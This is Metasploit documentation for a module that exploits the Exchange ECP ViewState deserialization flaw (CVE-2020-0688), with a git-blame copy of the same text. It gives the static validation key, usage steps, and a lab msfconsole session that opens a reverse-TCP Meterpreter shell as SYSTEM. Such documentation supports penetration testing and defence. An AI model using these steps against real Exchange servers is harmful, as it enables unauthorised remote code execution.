documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md

## Vulnerable Application

This module exploits a .NET serialization vulnerability in the Exchange Control
Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not
randomizing the keys on a per-installation basis resulting in them using the
same validationKey and decryptionKey values. With knowledge of these values, an
attacker can craft a special viewstate to cause an OS command to be executed by
NT_AUTHORITY\SYSTEM using .NET deserialization.

The default ViewState validation key is: `cb2721abdaf8e9dc516d621d8b8bf13a2c9e8689a25303bf`.

This module requires the user to authenticate to Exchange. At a minimum the user
must be a member of the `Domain Users` group and have a mailbox configured on
the Exchange server.

The crafted ViewState must be submitted to the server in a GET request (POST
requests will not work) which introduces a size restriction on the contents. Due
to this, OS commands are limited to a length of approximately 450 which accounts
for the overhead of the serialization data. The OS command must also be XML
encoded which increases the size as well. The .NET deserialization used is the
"TextFormattingRunProperties" chain from the [ysoserial.net][1] project.

## Verification Steps

  1. Install the application
  1. Start msfconsole
  1. Do: `use exploit/windows/http/exchange_ecp_viewstate`
  1. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
  4. Do: `run`
  5. You should get a shell.

## Options

### DOMAIN

The authentication realm for the corresponding `USERNAME` argument

### USERNAME

Username to log in with

### Password

Password to log in with

## Scenarios

### Exchange 2016 on Server 2012 x64

For example:

```
msf5 > use exploit/windows/http/exchange_ecp_viewstate
msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
RHOSTS => 192.168.159.129
msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
USERNAME => msflab.local\jdoe
msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
PASSWORD => Password1
msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
TARGET => 1
msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Command Stager progress -   3.61% done (449/12424 bytes)
[*] Command Stager progress -   7.23% done (898/12424 bytes)
[*] Command Stager progress -  10.84% done (1347/12424 bytes)
[*] Command Stager progress -  14.46% done (1796/12424 bytes)
[*] Command Stager progress -  18.07% done (2245/12424 bytes)
[*] Command Stager progress -  21.68% done (2694/12424 bytes)
[*] Command Stager progress -  25.30% done (3143/12424 bytes)
[*] Command Stager progress -  28.91% done (3592/12424 bytes)
[*] Command Stager progress -  32.53% done (4041/12424 bytes)
[*] Command Stager progress -  36.14% done (4490/12424 bytes)
[*] Command Stager progress -  39.75% done (4939/12424 bytes)
[*] Command Stager progress -  43.37% done (5388/12424 bytes)
[*] Command Stager progress -  46.98% done (5837/12424 bytes)
[*] Command Stager progress -  50.60% done (6286/12424 bytes)
[*] Command Stager progress -  54.21% done (6735/12424 bytes)
[*] Command Stager progress -  57.82% done (7184/12424 bytes)
[*] Command Stager progress -  61.44% done (7633/12424 bytes)
[*] Command Stager progress -  65.05% done (8082/12424 bytes)
[*] Command Stager progress -  68.67% done (8531/12424 bytes)
[*] Command Stager progress -  72.28% done (8980/12424 bytes)
[*] Command Stager progress -  75.89% done (9429/12424 bytes)
[*] Command Stager progress -  79.51% done (9878/12424 bytes)
[*] Command Stager progress -  82.74% done (10279/12424 bytes)
[*] Command Stager progress -  86.15% done (10703/12424 bytes)
[*] Command Stager progress -  89.43% done (11111/12424 bytes)
[*] Command Stager progress -  92.91% done (11543/12424 bytes)
[*] Command Stager progress -  96.28% done (11962/12424 bytes)
[*] Sending stage (206403 bytes) to 192.168.159.129
[*] Command Stager progress -  99.84% done (12404/12424 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
[*] Command Stager progress - 100.00% done (12424/12424 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : EXCHANGE
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > 
```

[1]: https://github.com/pwntester/ysoserial.net
Finish up the cve-2020-0688 module 2020-03-01 19:19:09 -05:00			`## Vulnerable Application`

			`This module exploits a .NET serialization vulnerability in the Exchange Control`
			`Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not`
			`randomizing the keys on a per-installation basis resulting in them using the`
Fix punctuation typo in exchange_ecp_viewstate 2020-05-20 09:47:11 -05:00			`same validationKey and decryptionKey values. With knowledge of these values, an`
Finish up the cve-2020-0688 module 2020-03-01 19:19:09 -05:00			`attacker can craft a special viewstate to cause an OS command to be executed by`
			`NT_AUTHORITY\SYSTEM using .NET deserialization.`

			The default ViewState validation key is: `cb2721abdaf8e9dc516d621d8b8bf13a2c9e8689a25303bf`.

			`This module requires the user to authenticate to Exchange. At a minimum the user`
			must be a member of the `Domain Users` group and have a mailbox configured on
			`the Exchange server.`

			`The crafted ViewState must be submitted to the server in a GET request (POST`
			`requests will not work) which introduces a size restriction on the contents. Due`
			`to this, OS commands are limited to a length of approximately 450 which accounts`
			`for the overhead of the serialization data. The OS command must also be XML`
			`encoded which increases the size as well. The .NET deserialization used is the`
			`"TextFormattingRunProperties" chain from the [ysoserial.net][1] project.`

			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use exploit/windows/http/exchange_ecp_viewstate`
			1. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
			4. Do: `run`
			`5. You should get a shell.`

remove and check for instruction text 2020-03-24 09:15:04 -04:00			`## Options`

Add a DOMAIN option to CVE-2020-0688 for consistency with other modules 2020-08-21 10:13:45 -04:00			`### DOMAIN`

			The authentication realm for the corresponding `USERNAME` argument

remove and check for instruction text 2020-03-24 09:15:04 -04:00			`### USERNAME`

			`Username to log in with`

			`### Password`

			`Password to log in with`

			`## Scenarios`

			`### Exchange 2016 on Server 2012 x64`
Finish up the cve-2020-0688 module 2020-03-01 19:19:09 -05:00
Add a DOMAIN option to CVE-2020-0688 for consistency with other modules 2020-08-21 10:13:45 -04:00			`For example:`

			```
			`msf5 > use exploit/windows/http/exchange_ecp_viewstate`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129`
			`RHOSTS => 192.168.159.129`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe`
			`USERNAME => msflab.local\jdoe`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1`
			`PASSWORD => Password1`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1`
			`TARGET => 1`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp`
			`PAYLOAD => windows/x64/meterpreter/reverse_tcp`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128`
			`LHOST => 192.168.159.128`
			`msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit`

			`[*] Started reverse TCP handler on 192.168.159.128:4444`
			`[*] Command Stager progress - 3.61% done (449/12424 bytes)`
			`[*] Command Stager progress - 7.23% done (898/12424 bytes)`
			`[*] Command Stager progress - 10.84% done (1347/12424 bytes)`
			`[*] Command Stager progress - 14.46% done (1796/12424 bytes)`
			`[*] Command Stager progress - 18.07% done (2245/12424 bytes)`
			`[*] Command Stager progress - 21.68% done (2694/12424 bytes)`
			`[*] Command Stager progress - 25.30% done (3143/12424 bytes)`
			`[*] Command Stager progress - 28.91% done (3592/12424 bytes)`
			`[*] Command Stager progress - 32.53% done (4041/12424 bytes)`
			`[*] Command Stager progress - 36.14% done (4490/12424 bytes)`
			`[*] Command Stager progress - 39.75% done (4939/12424 bytes)`
			`[*] Command Stager progress - 43.37% done (5388/12424 bytes)`
			`[*] Command Stager progress - 46.98% done (5837/12424 bytes)`
			`[*] Command Stager progress - 50.60% done (6286/12424 bytes)`
			`[*] Command Stager progress - 54.21% done (6735/12424 bytes)`
			`[*] Command Stager progress - 57.82% done (7184/12424 bytes)`
			`[*] Command Stager progress - 61.44% done (7633/12424 bytes)`
			`[*] Command Stager progress - 65.05% done (8082/12424 bytes)`
			`[*] Command Stager progress - 68.67% done (8531/12424 bytes)`
			`[*] Command Stager progress - 72.28% done (8980/12424 bytes)`
			`[*] Command Stager progress - 75.89% done (9429/12424 bytes)`
			`[*] Command Stager progress - 79.51% done (9878/12424 bytes)`
			`[*] Command Stager progress - 82.74% done (10279/12424 bytes)`
			`[*] Command Stager progress - 86.15% done (10703/12424 bytes)`
			`[*] Command Stager progress - 89.43% done (11111/12424 bytes)`
			`[*] Command Stager progress - 92.91% done (11543/12424 bytes)`
			`[*] Command Stager progress - 96.28% done (11962/12424 bytes)`
			`[*] Sending stage (206403 bytes) to 192.168.159.129`
			`[*] Command Stager progress - 99.84% done (12404/12424 bytes)`
			`[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500`
			`[*] Command Stager progress - 100.00% done (12424/12424 bytes)`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
			`Computer : EXCHANGE`
			`OS : Windows 2012 R2 (6.3 Build 9600).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : MSFLAB`
			`Logged On Users : 9`
			`Meterpreter : x64/windows`
			`meterpreter >`
			```
Finish up the cve-2020-0688 module 2020-03-01 19:19:09 -05:00
remove and check for instruction text 2020-03-24 09:15:04 -04:00			`[1]: https://github.com/pwntester/ysoserial.net`